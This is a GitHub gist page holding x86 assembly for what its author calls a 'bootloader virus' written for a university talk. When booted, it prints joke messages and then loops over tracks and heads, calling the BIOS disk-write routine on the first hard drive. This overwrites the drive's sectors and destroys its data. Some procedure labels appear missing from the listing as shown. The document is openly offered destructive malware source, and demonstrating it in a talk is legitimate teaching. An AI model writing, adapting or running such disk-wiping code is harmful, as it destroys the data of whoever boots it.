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Created January 6, 2015 16:10
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  • Save gnidan/471d76f43dee461e1546 to your computer and use it in GitHub Desktop.
Save gnidan/471d76f43dee461e1546 to your computer and use it in GitHub Desktop.
bootloader virus that I wrote for a talk at Drexel
org 0
jmp 0x07C0:START
bootMsg db 'Feed me disk sectors, AH AM HUNGRAH',10,13,0
allYourBase db 10,13,'BUUUUURP :-d',10,13,0
om db 'om ', 0
nom db 'nom ', 0
; update DS to be 7C0 instead of 0
push CS
pop DS
; update ES also
push CS
pop ES
; create stack
mov ax, 0x0000
mov ss, ax
mov sp, 0xFFFF
; print out the boot message
lea si, [bootMsg]
call Print
call EatData
lea si, [allYourBase]
call Print
jmp AllDone
; Procedure print
; prints a zero terminated string pointed to by si
push ax
mov ah, 14 ; BIOS code for screen display
lodsb ; moving the character to be displayed to al
or al, al ; checking if the char is NULL
jz printdone
int 10h ; Calling BIOS routine
JMP print_loop
pop ax
; End of print procedure...
push ax
push bx
push cx
push dx
lea si, [om]
call Print
; start at sector 2 so that we don't overwrite the boot sector
mov cl, 2 ;sector number
mov al, 1 ;num sectors
mov bx, 0x0 ;pointer to buffer
mov ch, 0 ;track
mov dh, 0 ;head
mov dl, 0x80; drive
mov ah, 0x03 ;BIOS write
int 0x13
inc cl ;increment the sector number, up until 17
cmp cl, 18
jne EatLoop
mov cl, 1 ; move to the next start sector of the next track and cylinder
inc ch ; next track
cmp ch, 255 ; should be allowed to go up to 1023 (thus check 1024) but
;this exceeds what can be stored in a byte
jne EatLoop
lea si, [nom]
call Print
mov ch, 0
inc dh
cmp dh, 16 ;these are set to one more than the max allowed
jne EatLoop
pop dx
pop cx
pop bx
pop ax
times 510-($-$$) db 0
dw 0aa55h
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